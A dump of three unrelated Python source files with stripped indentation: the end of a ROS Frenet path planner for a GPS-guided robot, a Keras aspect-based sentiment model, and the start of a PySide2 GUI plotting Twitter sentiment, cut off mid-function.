# tfp.cd = KJ * Jp_s + KT * dS + KD * tfp.d[-1] ** 2
# #纵向的损失函数
# tfp.cv = KJ * Js + KT * Ti + KD * ds
tfp.cf = KLAT * tfp.cd + KLON * tfp.cv
frenet_paths.append(tfp)
return frenet_paths
def calc_global_paths(fplist, csp):
for fp in fplist:
# calc global positions
for i in range(len(fp.s)):
ix, iy = csp.calc_position(fp.s[i])
if ix is None:
break
iyaw = csp.calc_yaw(fp.s[i])
di = fp.d[i]
fx = ix + di * math.cos(iyaw + math.pi / 2.0)
fy = iy + di * math.sin(iyaw + math.pi / 2.0)
fp.x.append(fx)
fp.y.append(fy)
# calc yaw and ds
for i in range(len(fp.x) - 1):
dx = fp.x[i + 1] - fp.x[i]
dy = fp.y[i + 1] - fp.y[i]
fp.yaw.append(math.atan2(dy, dx))
fp.ds.append(math.sqrt(dx**2 + dy**2))
fp.yaw.append(fp.yaw[-1])
fp.ds.append(fp.ds[-1])
# calc curvature
for i in range(len(fp.yaw) - 1):
fp.c.append((fp.yaw[i + 1] - fp.yaw[i]) / fp.ds[i])
return fplist
def check_collision(fp, ob):
for i in range(len(ob[:, 0])):
d = [((ix - ob[i, 0])**2 + (iy - ob[i, 1])**2)
for (ix, iy) in zip(fp.x, fp.y)]
collision = any([di <= ROBOT_RADIUS**2 for di in d])
if collision:
return False
return True
def check_paths(fplist, ob):
"""
check path above max speed, max a, does collision or not
"""
okind = []
for i in range(len(fplist)):
if any([v > MAX_SPEED for v in fplist[i].s_d]): # Max speed check
continue
elif any([abs(a) > MAX_ACCEL for a in fplist[i].s_dd]): # Max accel check
continue
elif any([abs(c) > MAX_CURVATURE for c in fplist[i].c]): # Max curvature check
continue
elif not check_collision(fplist[i], ob):
continue
okind.append(i)
return [fplist[i] for i in okind]
def frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob):
ob = np.array(ob)
fplist = calc_frenet_paths(c_speed, c_d, c_d_d, c_d_dd, s0)
fplist = calc_global_paths(fplist, csp)
fplist = check_paths(fplist, ob)
# find minimum cost path
mincost = float("inf")
bestpath = None
for fp in fplist:
if mincost >= fp.cf:
mincost = fp.cf
bestpath = fp
return bestpath
def generate_road_widle(x,y):
csp = Spline2D(x, y)
s = np.arange(0, csp.s[-1], 0.1)
road_left_x, road_left_y, road_right_x, road_right_y = [], [], [], []
for i_s in s:
ix, iy = csp.calc_position(i_s)
road_left_ix = ix + MAX_ROAD_WIDTH/2 * math.cos(csp.calc_yaw(i_s)+math.pi / 2.0)
road_left_iy = iy + MAX_ROAD_WIDTH/2 * math.sin(csp.calc_yaw(i_s)+math.pi / 2.0)
road_right_ix = ix - MAX_ROAD_WIDTH/2 * math.cos(csp.calc_yaw(i_s)+math.pi / 2.0)
road_right_iy = iy - MAX_ROAD_WIDTH/2 * math.sin(csp.calc_yaw(i_s)+math.pi / 2.0)
road_left_x.append(road_left_ix)
road_left_y.append(road_left_iy)
road_right_x.append(road_right_ix)
road_right_y.append(road_right_iy)
return road_left_x, road_left_y, road_right_x, road_right_y
def generate_target_course(x, y):
csp = Spline2D(x, y)
s = np.arange(0, csp.s[-1], 0.1) #0.1
rx, ry, ryaw, rk = [], [], [], []
for i_s in s:
ix, iy = csp.calc_position(i_s)
rx.append(ix)
ry.append(iy)
ryaw.append(csp.calc_yaw(i_s))
rk.append(csp.calc_curvature(i_s))
return rx, ry, ryaw, rk, csp
#######################################################################################
def load_global_path():
global zero_cord_x,zero_cord_y
bet = 0.1
blank = [] #buffer
white = [] #buffer
yellow = [] #buffer
GPS_x = [] #所采集预描点的x
GPS_y = [] #所采集预描点的x
#读取预描点
nums, ber = np.loadtxt("/home/robot/Robot/Smart_robot_ws/src/GNSS_driver/save_point_data/rightdoubleliner.txt", dtype=str, delimiter=',', unpack=True)
for i in range(len(nums)):
if not nums[i] in blank: #去除重复点
#blank.append(nums[i])
yellow.append(float(nums[i]))
white.append(float(ber[i]))
bx = yellow[0] #起始点坐标
by = white[0]
for i in range(len(yellow)):
dx = yellow[i] - bx
dy = white[i] - by
dis = math.sqrt(dx ** 2 + dy ** 2)
if dis > bet: #选取大于设定的距离的点
GPS_x.append(yellow[i]) #使cx,cy中点均满足要求
GPS_y.append(white[i])
bx = yellow[i]
by = white[i]
GPS_x = np.array(GPS_x) #将列表转换成数组
GPS_y = np.array(GPS_y)
#print("cx:",cx)
#print("cy:",cy)
zero_cord_x = GPS_x[0]
zero_cord_y = GPS_y[0]
GPS_x = GPS_x - zero_cord_x
GPS_y = GPS_y - zero_cord_y
plt.plot(GPS_x,GPS_y, "-r", label="GPS point ")
plt.plot()
plt.show()
return GPS_x, GPS_y
class Info(object):
def __init__(self):
self.CurrGPS_lat = float(-1)
self.CurrGPS_lon = float(-1)
self.CurrentVelocity = float(-1)
self.Target_Velocity = float(-1)
self.ImuYaw = float(-1)
self.Target_Theta = float(-1)
#self.CommandMessage = Car_Input()
self.gob = np.array([])
self.ob = np.array([])
self.gobx = np.array([])
self.goby = np.array([])
# Subscribers
rospy.Subscriber("coordinate", Point, self.FeedbackCallbackObs)
sub = rospy.Subscriber('gnss_message', GNSS_CAN, self.FeedbackCallbackGPSIMU,queue_size = 10) #订阅GPS数据
rospy.Subscriber("Motor_Feedback_mssage", Motor_Feedback,self.RVcallback,queue_size = 10)
def FeedbackCallbackGPSIMU(self, msg):
self.CurrGPS_lat = msg.latitude
self.CurrGPS_lon = msg.longitude
self.ImuYaw = (90-msg.course_angle)*np.pi/180
#print(self.CurrGPS_lat,self.CurrGPS_lon,self.ImuYaw)
def FeedbackCallbackObs(self, msg):
global Gob_x
global Gob_y
self.gobx = msg.x
self.goby = msg.y
#print("msg.x","msg.y", msg.x, msg.y)
Gob_x.append(self.gobx)
Gob_y.append(self.goby)
#print("Gob_x","Gob_y", Gob_x, Gob_y)
#np.append(self.gobx,5)
#np.append(self.goby,5)
self.gob = np.column_stack((Gob_x, Gob_y))
#print(self.gobx,self.goby)
#print(self.gob)
def RVcallback(self,msg):
self.CurrentVelocity = msg.Base_Vehspd
#print("*"*50)
#print("rv:",rv)
#rospy.loginfo('I heard: %s', data.data)
def init(self):
return self.CurrGPS_lat, self.CurrGPS_lon, self.ImuYaw, self.gobx, self.goby, self.gob, self.CurrentVelocity
def talker(self,Target_Velocity, path_record):
self.rate = rospy.Rate(100) # 10hz
self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32, queue_size = 10) #定义Publisher对象
# 定义发布器 path_pub 发布 trajectory
self.path_pub = rospy.Publisher('trajectory', localPath, queue_size = 50) #定义Publisher对象
self.pub_Velocity.publish(Target_Velocity)
# 发布路径
self.path_pub.publish(path_record)
#self.rate.sleep()
# def talker(self,Target_Velocity,Target_Theta):
# self.pub_Velocity = rospy.Publisher('Car_Velocity', Float32, queue_size = 10) #定义Publisher对象
# self.pub_Steering = rospy.Publisher('Car_Steering', Float32, queue_size = 10)
# self.rate = rospy.Rate(100) # 10hz
# self.pub_Velocity.publish(Target_Velocity)
# self.pub_Steering.publish(Target_Theta)
# self.rate.sleep()
#######################################################################################
def get_transalation(curr_gps_lat,curr_gps_lon):
curr_posy=(float(curr_gps_lon)-zero_cord_y)
curr_posx=(float(curr_gps_lat)-zero_cord_x)
#print("curr_posy,curr_posx=",curr_posy,curr_posx)
return curr_posx, curr_posy
def get_transformation(pt,curr_yaw,T):
c, s = np.cos(curr_yaw), np.sin(curr_yaw)
R = (np.array(((c,-s), (s, c))))
pt=pt.dot(R)+T
return pt
def get_arc_length(tx,ty,st):
arc_length=0
for x in range(1,st):
arc_length=arc_length+(np.hypot((tx[x-1]-tx[x]),(ty[x-1]-ty[x])))
return arc_length
def get_lateral_dist(tx,ty,curr_posx,curr_posy):
dist=[]
for x in range(0,len(tx)-1):
dist.append(np.hypot((float(curr_posx)-tx[x]),(float(curr_posy)-ty[x])))
lat_dist=min(dist)
st=dist.index(min(dist))
theta1=math.atan2((ty[st]-ty[st-1]),(tx[st]-tx[st-1]))
theta2=math.atan2((curr_posy-ty[st-1]),(curr_posx-tx[st-1]))
if lat_dist<THRESH_DIST:
lat_dist=0
curr_posx=tx[st]
curr_posy=ty[st]
if theta2<theta1:
lat_dist=-lat_dist
# print(lat_dist)
return st, lat_dist, curr_posx, curr_posy
def proportional_control(target, current):
#print("*"*50)
#print("current=",current)
#print("target - current",target - current)
a = 1.0 * (target - current)
return a
def main():
ptx = []
pty = []
ptx, pty = load_global_path()
tx, ty, tyaw, tc, csp = generate_target_course(ptx, pty)
#print(csp)
road_left_x, road_left_y, road_right_x, road_right_y = generate_road_widle(ptx, pty)
#当前车速及加速度
c_speed = 5.0/3.6
c_acc = 1.0
c_d_dd = 0
c_d_d = 0
area = 25.0 # animation area length [m]
start = time.time()
rospy.init_node('AvoidObstacles_PlannerOut', anonymous = False)
my_node = Info()
while not rospy.is_shutdown():
CurrGPS_lat, CurrGPS_lon, ImuYaw, gobx, goby, gob, CurrentVelocity = my_node.init()
#print("gob",gob)
ob = []
if (CurrGPS_lat != -1 and CurrGPS_lon != -1 and ImuYaw != -1):
#print(CurrGPS_lat,CurrGPS_lon,ImuYaw, curr_posx, curr_posy)
#print(gobx,goby,gob)
#path = frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob)
#s0 = path.s[1]
#c_d = path.d[1]
#c_d_d = path.d_d[1]
#c_d_dd = path.d_dd[1]
#c_speed = path.s_d[1]
curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)
T = [curr_posx, curr_posy]
curr_yaw = ImuYaw #+ math.pi / 2
if (len(gob) == 0):
ob = [[-20, -20]]
else:
ob = gob
ob_len = len(ob)-1
for x in xrange(0, ob_len):
#print("ob_transformation",ob)
ob = np.array(ob)
#ob[x, :] = .2 * ob[x, :]
ob[x, :] = get_transformation(ob[x, :], -curr_yaw, T)
#print("ob_transformation",ob)
#############################################################
# c_d_dd = c_acc*math.cos(math.atan2((ty[spt]-curr_posy),(tx[spt]-curr_posx))+curr_yaw)
#spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty, curr_posx, curr_posy)
#curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)
try:
curr_posx, curr_posy = get_transalation(CurrGPS_lat, CurrGPS_lon)
spt, c_d, curr_posx, curr_posy = get_lateral_dist(tx, ty, curr_posx, curr_posy)
s0 = get_arc_length(tx, ty, spt)
path = frenet_optimal_planning(csp, s0, c_speed, c_d, c_d_d, c_d_dd, ob)
c_speed = path.s_d[1]
#c_d_d = c_speed*math.cos(math.atan2((ty[spt]-curr_posy),(tx[spt]-curr_posx))-curr_yaw)
c_d_d = path.d_d[1]
c_d_dd = path.d_dd[1]
if np.hypot(path.x[1] - tx[-1], path.y[1] - ty[-1]) <= 1.0:
print("Goal")
c_speed = 0.0
break
if show_animation:
plt.cla()
plt.plot(tx, ty, "-.k")
plt.plot(road_left_x, road_left_y, "-k")
plt.plot(road_right_x, road_right_y, "-k")
plt.plot(ob[:, 0], ob[:, 1], "ob")
plt.plot(path.x[1:], path.y[1:], "-or")
plt.plot(path.x[1], path.y[1], "vc")
plt.xlim(path.x[1] - area, path.x[1] + area)
plt.ylim(path.y[1] - area, path.y[1] + area)
plt.arrow(curr_posx, curr_posy, math.cos(curr_yaw), math.sin(curr_yaw),fc="r", ec="k", head_width=0.5, head_length=1.0)
plt.title("v[km/h]:" + str(c_speed)[0:4])
plt.xlabel(u'x/m', fontsize=14) # 设置x轴,并设定字号大小
plt.ylabel(u'y/m', fontsize=14) # 设置y轴,并设定字号大小
plt.pause(0.0001)
####################规划成功###############
###########################################
PathFail_flag = 0
###########################################
except:
###############规划失败################
PathFail_flag = 1
print("Don't find optimal path")
################对障碍物堆栈清空############
############################################
############################################
global Gob_x
global Gob_y
Gob_x*=0
Gob_y*=0
############################################
############################################
###############################################################################
try:
'''
acc = proportional_control(6, CurrentVelocity)
temp1=path.yaw[1] `
temp2=curr_yaw
if temp1<0:
temp1=6.28+temp1
if temp2<0:
temp2=6.28+temp2
val = temp1-temp2
if val > 3.14:
val = val - 6.28
if val < -3.14:
val = val + 6.28
val = math.degrees(val)
if val > 50:
val = 50
if val < -50:
val = -50
my_node.talker(acc,val)
'''
path_record = localPath()
# 配置路径
for i in range(len(path.x[1:])):
#print("path_x",path.x[i])
path_record.path_x.append(path.x[i])
path_record.path_y.append(path.y[i])
# 路径数量限制
if len(path_record.path_x) > 10000:
path_record.path_x.pop(0)
path_record.path_y.pop(0)
# 发布路径`
my_node.talker(c_speed, path_record)
except:
print("local path send fail")
pass
#my_node.talker(c_speed, path.x[1:], path.y[1:])
#except:
# pass
print("Finish")
end = time.time()
#print("total time: ", end - start)
if show_animation:
plt.grid(True)
plt.show()
if __name__ == "__main__":
main()
|
8,198 | 0b125e7e9e763d4fd71e381ca823f9e9aa8ea606 | from scipy.stats import itemfreq
from sklearn.model_selection import StratifiedKFold
from keras_utils.keras_utils import *
from keras.utils.np_utils import to_categorical
from keras.layers import Input, Embedding, Dense, GlobalAveragePooling1D, Flatten
from keras.layers import add, multiply, LSTM, Bidirectional, BatchNormalization, LeakyReLU, concatenate, Lambda
from keras.models import Model
from keras import backend as K
def f1(y_true, y_pred):
def recall(y_true, y_pred):
"""Recall metric.
Only computes a batch-wise average of recall.
Computes the recall, a metric for multi-label classification of
how many relevant items are selected.
"""
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))
recall = true_positives / (possible_positives + K.epsilon())
return recall
def precision(y_true, y_pred):
"""Precision metric.
Only computes a batch-wise average of precision.
Computes the precision, a metric for multi-label classification of
how many selected items are relevant.
"""
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))
precision = true_positives / (predicted_positives + K.epsilon())
return precision
precision = precision(y_true, y_pred)
recall = recall(y_true, y_pred)
return 2 * ((precision * recall) / (precision + recall + K.epsilon()))
def precision(y_true, y_pred):
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))
precision = true_positives / (predicted_positives + K.epsilon())
return precision
def recall(y_true, y_pred):
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))
recall = true_positives / (possible_positives + K.epsilon())
return recall
class MaskedGlobalAveragePooling1D(GlobalAveragePooling1D):
def __init__(self, **kwargs):
super(MaskedGlobalAveragePooling1D, self).__init__(**kwargs)
self.supports_masking = True
class MaskableFlatten(Flatten):
def __init__(self, **kwargs):
super(MaskableFlatten, self).__init__(**kwargs)
self.supports_masking = True
# train data path
DATA1_TRAIN_PATH = '../data/data_1_train.csv'
DATA2_TRAIN_PATH = '../data/data_2_train.csv'
# GLoVe pre-trained word vectors path
EMBEDDING_DIR = '../embeddings/'
EMBEDDING_TYPE = 'glove.6B.300d.txt' # glove.6B.300d.txt
EMBEDDING_PICKLE_DIR = 'embeddings_index.p'
EMBEDDING_ERROR_DIR = 'embeddings_error.p'
ASPECT_EMBEDDING_DIR = 'aspect_embeddings.p'
# tokenizer path
TOKENIZER_DIR = 'embeddings/tokenizer.p'
MAX_SEQ_LENGTH = 60
MAX_NB_WORDS = 95000
EMBEDDING_DIM = 300
# aspect dictionary
aspect_dict = {}
"""
What this model does:
2 ip - 1 op model : 2 ip = sentence and aspect sentence
Shared embedding layer = reduce # of params and chance to overfit.
sentence embedding = sentence passed through embedding layer (keep for later)
aspect embedding = aspect sentence passed through embedding layer
On this aspect embedding, use attention mechanism to jointly learn what is the "best" augmentation to the sentence embedding
- Dense layer that maps 1 : 1 between the aspect embedding and the aspect attention
- Softmax forces it to choose the "parts" of the sentence that help the most in training
- No bias needed for attention
- Next is to actually augment the aspect embeddings with this learned attention
- The element-wise multiplication forces many embeddings to become close to zero
- Only a few will remain "strong" after this multiplication. These are the "important" words in the aspect sentence
Finally, augment the original sentence embeddings with the attended aspect embeddings
- This will "add" some strength to the embeddings of the "important" words
- Remaining words will not be impacted at all (since they are added with near zero values)
Benefits of this model
- Choose if you want to send a unique aspect sentence for the corresponding sentence
- By this I mean, you have a choice
- 1) Use the original sentence as aspect input.
In doing so, it is basically like saying learn on your own what the aspect word is
It may not give much benefit, as the attended vector has the chance of being all equal (no attention)
- 2) Use a true aspect encoding as the aspect input.
Since you are sharing the embedding now, you cannot use random / own assigned aspects anymore.
The aspect ids that you pass will now be from the original embedding matrix using the word_index
dict that Keras gives you.
In this case, an aspect sentence would be of the form :
[0 0 ... 32506 66049 5968 0 0 ...]
Here 32506 = "Apple", 66049 = "Macbook" 5968 = "Pro" (say)
"""
NUM_CLASSES = 3 # 0 = neg, 1 = neutral, 2 = pos
MAX_SENTENCE_LENGTH = 60
MAX_NUM_WORDS = 20000 # this will be number of unique "words" (n-grams etc) there are
MAX_NUM_ASPECT_WORDS = 300 # this will be the number of unique aspect "words" (uni-grams only)
EMBEDDING_DIM = 300
EMBEDDING_WEIGHTS = None
MASK_ZEROS = True # this can be true ONLY for RNN models. If even 1 CNN is there, it will crash
#
# embedding = Embedding(MAX_NUM_WORDS, output_dim=EMBEDDING_DIM, mask_zero=MASK_ZEROS,
# weights=EMBEDDING_WEIGHTS, trainable=False)
#
# sentence_ip = Input(shape=(MAX_SENTENCE_LENGTH,), dtype='int32')
# aspect_ip = Input(shape=(MAX_SENTENCE_LENGTH,), dtype='int32')
#
# sentence_embedding = embedding(sentence_ip) # Note: these are same embedding layer
# aspect_embedding = embedding(aspect_ip) # Note: these are same embedding layer
#
# # Create the attention vector for the aspect embeddings
# aspect_attention = Dense(EMBEDDING_DIM, activation='softmax', use_bias=False,
# name='aspect_attention')(aspect_embedding)
#
# # dampen the aspect embeddings according to the attention with an element-wise multiplication
# aspect_embedding = multiply([aspect_embedding, aspect_attention])
#
# # augment the sample embedding with information from the attended aspect embedding
# sentence_embedding = add([sentence_embedding, aspect_embedding])
#
# # now you can continue with whatever layer other than CNNs
#
# x = LSTM(100)(sentence_embedding)
# x = Dense(NUM_CLASSES, activation='softmax')(x)
#
# model = Model(inputs=[sentence_ip, aspect_ip], outputs=x)
#
# model.summary()
#
#
# from keras.utils.vis_utils import plot_model
# plot_model(model, to_file='shared_embedding.png', show_shapes=False, show_layer_names=True)
#
"""
What this model does:
2 ip - 1 op model : 2 ip = sentence and aspect sentence
Disjoing embedding layer = more # of params and chance to overfit.
sentence embedding = sentence passed through embedding layer (keep for later ; not learned)
aspect embedding = aspect sentence passed through embedding layer (learned)
Benefits of this model
- Use a true aspect encoding as the aspect input.
Since you are learning the embedding now, you can use own assigned aspects.
In this case, an aspect sentence would be of the form :
[0 0 ... 2 2 2 0 0 ...]
Here 2 = "Apple", 2 = "Macbook" 2 = "Pro" (say)
Therefore, the id is given by you, and is shared over all of the aspect words for a given aspect term.
"""
def output_shape(input_shape):
shape = list(input_shape)
shape[-1] /= 2
print(shape)
return tuple(shape)
def model_2():
K.clear_session()
tech_reviews, food_reviews = load_and_clean()
embedding_matrix, aspect_sequences, padded_sequences, labels = load_embedding_matrix(food_reviews)
# labels = [x+1 for x in labels]
print(itemfreq(labels))
indices = np.arange(0, padded_sequences.shape[0], step=1, dtype=int)
np.random.shuffle(indices)
padded_sequences = padded_sequences[indices]
labels = to_categorical(labels, num_classes=NUM_CLASSES)
labels = labels[indices]
aspect_sequences = aspect_sequences[indices]
sentence_embedding = Embedding(MAX_NUM_WORDS, output_dim=EMBEDDING_DIM, mask_zero=MASK_ZEROS,
weights=EMBEDDING_WEIGHTS, trainable=False)
# aspect_embedding = Embedding(MAX_NUM_ASPECT_WORDS, EMBEDDING_DIM, mask_zero=MASK_ZEROS, trainable=True)
# this needs to be True
aspect_embedding = Embedding(len(aspect_dict) + 1, EMBEDDING_DIM, mask_zero=MASK_ZEROS, trainable=True)
sentence_ip = Input(shape=(MAX_SENTENCE_LENGTH,), dtype='int32')
aspect_ip = Input(shape=(MAX_SENTENCE_LENGTH,), dtype='int32')
sentence_embedding = sentence_embedding(sentence_ip) # Note: these are two different embeddings
aspect_embedding = aspect_embedding(aspect_ip) # Note: these are two different embeddings
# Create the attention vector for the aspect embeddings
aspect_attention = Dense(EMBEDDING_DIM, activation='sigmoid', use_bias=False,
name='aspect_attention')(aspect_embedding)
# dampen the aspect embeddings according to the attention with an element-wise multiplication
aspect_embedding = multiply([aspect_embedding, aspect_attention])
# augment the sample embedding with information from the attended aspect embedding
sentence_embedding = concatenate([sentence_embedding, aspect_embedding])
# now you can continue with whatever layer other than CNNs
# x = MaskedGlobalAveragePooling1D()(sentence_embedding)
# x = MaskableFlatten()(sentence_embedding)
x = LSTM(256)(sentence_embedding)
# y = Lambda(lambda z: z[:, :, :NUM_CELLS//2], output_shape=output_shape)(x)
# x = Dense(NUM_CELLS//2, activation='softmax', use_bias=False)(x)
# x = multiply([x, y])
# x = MaskedGlobalAveragePooling1D()(x)
# x = Dense(256, activation='linear', kernel_initializer='he_normal')(x)
# x = BatchNormalization()(x)
# x = LeakyReLU()(x)
x = Dense(3, activation='softmax')(x)
model = Model(inputs=[sentence_ip, aspect_ip], outputs=x)
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['acc'])
print(model.summary())
model.fit([padded_sequences, aspect_sequences], labels, epochs=10, verbose=1, validation_split=0.2)
# from keras.utils.vis_utils import plot_model
# plot_model(model, to_file='learned_embedding.png', show_shapes=False, show_layer_names=True)
def model_2_CV():
K.clear_session()
tech_reviews, food_reviews = load_and_clean()
embedding_matrix, aspect_sequences, padded_sequences, labels = load_embedding_matrix(tech_reviews)
labels = np.array([x + 1 for x in labels])
print(itemfreq(labels))
# Random shuffling of padded, aspect sequences and labels
# indices = np.arange(0, padded_sequences.shape[0], step=1, dtype=int)
# np.random.shuffle(indices)
# padded_sequences = padded_sequences[indices]
# labels = to_categorical(labels, num_classes=NUM_CLASSES)
# labels = labels[indices]
# aspect_sequences = aspect_sequences[indices]
print(labels.shape)
N_FOLDS = 3
fbeta_scores = []
skf = StratifiedKFold(N_FOLDS, shuffle=True, random_state=1000)
for j, (train_idx, test_idx) in enumerate(skf.split(padded_sequences, labels)):
print('Fold %d' % (j + 1))
sentence_train, aspect_train, y_train = padded_sequences[train_idx], aspect_sequences[train_idx], \
labels[train_idx]
sentence_test, aspect_test, y_test = padded_sequences[test_idx], aspect_sequences[test_idx], labels[test_idx]
y_train = to_categorical(y_train, 3)
y_test = to_categorical(y_test, 3)
sentence_embedding = Embedding(MAX_NUM_WORDS, output_dim=EMBEDDING_DIM, mask_zero=MASK_ZEROS,
weights=EMBEDDING_WEIGHTS, trainable=False)
aspect_embedding = Embedding(len(aspect_dict) + 1, EMBEDDING_DIM, mask_zero=MASK_ZEROS, trainable=True)
sentence_ip = Input(shape=(MAX_SENTENCE_LENGTH,), dtype='int32')
aspect_ip = Input(shape=(MAX_SENTENCE_LENGTH,), dtype='int32')
sentence_embedding = sentence_embedding(sentence_ip) # Note: these are two different embeddings
aspect_embedding = aspect_embedding(aspect_ip) # Note: these are two different embeddings
# Create the attention vector for the aspect embeddings
aspect_attention = Dense(EMBEDDING_DIM, activation='sigmoid', use_bias=False,
name='aspect_attention')(aspect_embedding)
# dampen the aspect embeddings according to the attention with an element-wise multiplication
aspect_embedding = multiply([aspect_embedding, aspect_attention])
# augment the sample embedding with information from the attended aspect embedding
sentence_embedding = concatenate([sentence_embedding, aspect_embedding])
x = LSTM(256)(sentence_embedding)
x = Dense(3, activation='softmax')(x)
model = Model(inputs=[sentence_ip, aspect_ip], outputs=x)
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['acc', fbeta_score])
print(model.summary())
model.fit([sentence_train, aspect_train], y_train, epochs=5, verbose=1,
validation_data=([sentence_test, aspect_test], y_test))
scores = model.evaluate([sentence_test, aspect_test], y_test)
fbeta_scores.append(scores[-1])
print("Average fbeta score : ", sum(fbeta_scores) / len(fbeta_scores))
def model_3():
K.clear_session()
tech_reviews, food_reviews = load_and_clean()
embedding_matrix, aspect_sequences, padded_sequences, labels = load_embedding_matrix(food_reviews)
labels = np.array([x + 1 for x in labels])
print(itemfreq(labels))
N_FOLDS = 10
skf = StratifiedKFold(N_FOLDS, shuffle=True, random_state=1000)
f = open('history.txt', 'w+')
for j, (train_idx, test_idx) in enumerate(skf.split(padded_sequences, labels)):
print('Fold %d' % (j + 1))
sentence_train, y_train = padded_sequences[train_idx], labels[train_idx]
sentence_test, y_test = padded_sequences[test_idx], labels[test_idx]
y_train = to_categorical(y_train, 3)
y_test = to_categorical(y_test, 3)
sentence_embedding = Embedding(MAX_NUM_WORDS, output_dim=EMBEDDING_DIM, mask_zero=MASK_ZEROS,
weights=EMBEDDING_WEIGHTS, trainable=False)
# labels = to_categorical(labels, 3)
sentence_ip = Input(shape=(MAX_SENTENCE_LENGTH,), dtype='int32')
sentence_embedding = sentence_embedding(sentence_ip) # Note: these are two different embeddings
x = LSTM(256, dropout=0.2, recurrent_dropout=0.2)(sentence_embedding)
x = Dense(3, activation='softmax')(x)
model = Model(inputs=sentence_ip, outputs=x)
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['acc', f1, precision, recall])
print(model.summary())
history = model.fit(sentence_train, y_train, epochs=10, verbose=1, validation_data=(sentence_test, y_test))
f.write('\nFold %d\n' % (j + 1))
f.write(str(history.history['acc']))
f.write(str(history.history['val_acc']))
f.write(str(history.history['f1']))
f.write(str(history.history['precision']))
f.write(str(history.history['recall']))
if __name__ == '__main__':
model_3()
|
8,199 | 8cabacb64f3b193b957c61d6e1ca21f2046e52d1 | #---------------------------------------------
# File name: phase2app.py
# Description: Launches GUI for Twitter User Timeline Sentiment Analysis program
# Author: Gilbert Yap (gilberty@bu.edu)
# Date: October 03, 2020
#---------------------------------------------
from PySide2.QtWidgets import QApplication, QDialog, QVBoxLayout, QMessageBox
from PySide2.QtCore import Qt, QFile, QRegExp
from PySide2.QtGui import QRegExpValidator
from phase2GUI import Ui_Dialog
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
import configparser, csv, datetime, sys
sys.path.insert(1, '..\\SharedFiles\\')
import matplotlib.pyplot as plt
import helper, phase2Functions
SETTINGS_FILE = '..\\SharedFiles\\settings.ini'
class Ui_Window(QDialog):
def __init__(self):
super(Ui_Window, self).__init__()
self.ui = Ui_Dialog()
self.ui.setupUi(self)
# Set regex validator for the username
regex = QRegExp("\w+")
validator = QRegExpValidator(regex)
self.ui.usernameLineEdit.setValidator(validator)
# Set the end date to today by default
self.ui.endMonthSpinBox.setValue(datetime.datetime.now().month)
self.ui.endDaySpinBox.setValue(datetime.datetime.now().day)
self.ui.endYearSpinBox.setValue(datetime.datetime.now().year)
# Place a plot inside of plotDisplayGroupBox
self.figure = plt.figure()
self.canvas = FigureCanvas(self.figure)
self.toolbar = NavigationToolbar(self.canvas, self)
layout = QVBoxLayout()
layout.addWidget(self.toolbar)
layout.addWidget(self.canvas)
self.ui.plotDisplayGroupBox.setLayout(layout)
# Set up signals
self.ui.processDatesPushButton.clicked.connect(self.plotSentiment)
self.ui.exportPushButton.clicked.connect(self.exportValues)
# Init APIs
settings = configparser.ConfigParser()
settings.read(SETTINGS_FILE)
helper.print_with_stars('Initializing APIs')
(twitterApi, googleClient, errors) = phase2Functions.init_apis(settings['KEYS']['api_key'], settings['KEYS']['api_secret_key'])
if(len(errors) > 0):
self.printMessages(errors)
sys.exit(1)
else:
self.twitterApi = twitterApi
self.googleClient = googleClient
self.show()
'''
Plot the sentiment score
Input - self:Ui_Window
Output - None
'''
def plotSentiment(self):
QApplication.setOverrideCursor(Qt.WaitCursor)
# Get the sentiment data
startDate = self.get_start_date()
endDate = self.get_end_date()
if (startDate is None) or (endDate is None):
return
(dateList, scoreList, magnitudeList, tweetList, errors) = phase2Functions.generate_data_lists(self.twitterApi, self.googleClient, self.get_username(), startDate, endDate)
QApplication.restoreOverrideCursor()
# If there were any errors, print them out
if(len(errors) > 0):
self.printMessages(errors)
else:
# If there are no errors, format and plot out the data
self.plotData = (dateList, scoreList, magnitudeList)
self.tweetList = tweetList
self.figure.clear()
ax = self.figure.add_subplot(111)
self.figure.subplots_adjust(top=0.88,
bottom=0.255,
left=0.17,
right=0.9,
hspace=0.2,
wspace=0.2)
ax.set_title("Sentiment Analysis of @{}'s tweets".format(self.get_username(),))
ax.set_xlabel("Date")
ax.set_ylabel("Sentiment Value")
ax.xaxis.set_major_locator(plt.MaxNLocator(10))
for tick in ax.get_xticklabels():
tick.set_rotation(45)
ax.plot(self.plotData[0],self.plotData[1],"-bo",label='Sentiment Score')
ax.plot(self.plotData[0],self.plotData[2], "-ro",label='Sentiment Magnitude')
ax.legend(loc="lower right")
self.canvas.draw()
self.enableExport()
'''
Gets username from text field
Input - self:Ui_Window
Output - string
'''
def get_username(self):
return (self.ui.usernameLineEdit.text())
'''
Gets start date from spin boxes
Input - self:Ui_Window
Output - datetime.datetime
'''
def get_start_date(self):
start_month = self.ui.startMonthSpinBox.value()
start_day = self.ui.startDaySpinBox.value()
start_year = self.ui.startYearSpinBox.value()
try:
startDate = datetime.datetime(start_year, start_month,start_day)
except:
self.printMessages(['Start date is improperly set. Check to see that the date is correct/exists.'])
return None
return startDate
'''
Gets end date from spin boxes
Input - self:Ui_Window
Output - datetime.datetime
'''
def get_end_date(self):
end_month = self.ui.endMonthSpinBox.value()
end_day = self.ui.endDaySpinBox.value()
end_year = self.ui.endYearSpinBox.value()
try:
endDate = datetime.datetime(end_year, end_month,end_day)
except:
